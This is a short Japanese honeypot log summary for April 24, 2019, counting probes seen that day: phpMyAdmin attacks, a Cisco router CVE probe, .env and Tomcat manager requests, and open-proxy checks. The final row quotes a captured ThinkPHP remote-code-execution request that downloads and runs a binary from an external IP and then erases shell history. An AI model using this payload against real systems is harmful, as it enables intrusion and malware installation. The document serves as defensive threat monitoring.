BW-Potのログ分析 (2019/04/24)
本日の総アクセス件数は138件です。送信元IP数は7IPです。
少ないですね。
| 件数 | 種別 | リクエスト |
| 66 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 63 | アクセス | GET / |
| 2 | Cisco製ルータの脆弱性(CVE-2019-1653)に関する攻撃 | GET /cgi-bin/config.exp |
| 2 | 環境設定の調査 | GET /.env |
| 1 | 不正中継の調査 | GET 110.249.212[.]46/testget?q=23333&port=80 |
| 1 | 不正中継の調査 | GET httpheader[.]net/ |
| 1 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | アクセス | HEAD / |
| 1 | 不明 | GET /index.php?s=/index/ hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget hxxp://185.244.25[.]131/x86 -O .Akari; chmod +x .Akari; rm -rf .Akari x86; history -c -w;exit;logout;' |
